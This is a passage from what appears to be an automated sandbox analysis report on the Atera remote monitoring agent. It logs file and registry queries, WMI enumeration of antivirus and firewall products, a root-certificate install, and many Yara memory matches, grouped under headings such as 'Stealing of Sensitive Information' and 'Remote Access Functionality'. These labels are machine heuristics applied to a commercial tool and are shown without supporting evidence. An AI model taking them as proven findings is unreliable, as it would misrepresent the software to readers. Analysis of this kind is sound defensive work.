                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Code function: 37_2_00007FFB02EBCC04 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,37_2_00007FFB02EBCC04
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Code function: 37_2_00007FFB02EB85D4 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,_malloc_crt,_invoke_watson,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,37_2_00007FFB02EB85D4
                                Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct

                                Stealing of Sensitive Information

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Device IO: \Device\Harddisk0\DR0

                                Remote Access Functionality

                                Source: Yara match File source: 22.2.AgentPackageAgentInformation.exe.26ad1de0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 55.0.AgentPackageInternalPoller.exe.1cc122b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 51.0.AgentPackageTicketing.exe.24844c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 26.2.AteraAgent.exe.1a88220e3d8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 20.0.AgentPackageAgentInformation.exe.1fd40e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 51.2.AgentPackageTicketing.exe.248450a0000.2.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 37.2.AgentPackageMonitoring.exe.22ac0860000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 58.2.AgentPackageMarketplace.exe.16597fe0000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 51.2.AgentPackageTicketing.exe.24845080000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 47.0.AgentPackageUpgradeAgent.exe.10b6e4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 32.0.AgentPackageSTRemote.exe.27054f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 58.2.AgentPackageMarketplace.exe.165b08f0000.3.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 14.0.AteraAgent.exe.1e726670000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 53.0.AgentPackageProgramManagement.exe.2139a630000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 26.2.AteraAgent.exe.1a881da58e0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 37.0.AgentPackageMonitoring.exe.22abff10000.0.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 26.2.AteraAgent.exe.1a881f474b8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.2372374653.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2463729683.000001327BD78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916974804.00000234765D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2149932355.000001E433267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2116373812.0000016598360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2149932355.000001E4332A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E72861C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2116373812.00000165981E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1581326542.000001FD410F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262778000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2467763966.000001327BEBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A8821BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B602000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2251027525.0000013261DC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E433AE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2374062849.0000010B6E6B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1450020541.000001E740DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2451097545.000001327ADB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E43400F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1581307208.0000026AD1C2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2464216843.000001327BD89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2398400715.0000010B6F66D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000003.2211678860.000001DCFD93F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2375885446.0000010B6E6FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2486369550.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2571688057.000002484567F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1925477451.0000023477EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B456000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2260851037.000001DCFCEA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2185783714.0000027055A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1581953324.000001FD41290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12E92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2571688057.000002484569A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1813948689.0000022AC09F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2251027525.0000013261D8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000003.2259674070.000001DCFCE8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2567716195.0000024845571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000003.2199718166.000001DCFD870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2270718409.00000213B3AF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1585649904.000001FD5A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2097548512.000001CC12630000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1811600613.0000022AC020D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2251027525.0000013261D48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E72855A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2079198013.000001CC12501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1831031514.0000022AD9EF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916974804.00000234765D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2133420336.000002139A868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2120854347.000001CC2B3E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2557424095.00007FFB03050000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2116373812.0000016598488000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2183431943.00000270551E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1916974804.000002347668E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1841698433.00007FFB03049000.00000004.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2372906148.0000010B6E685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B335000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2257779174.00000213B382A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2300042088.000001E44C5BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.1827657488.0000022AD90B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
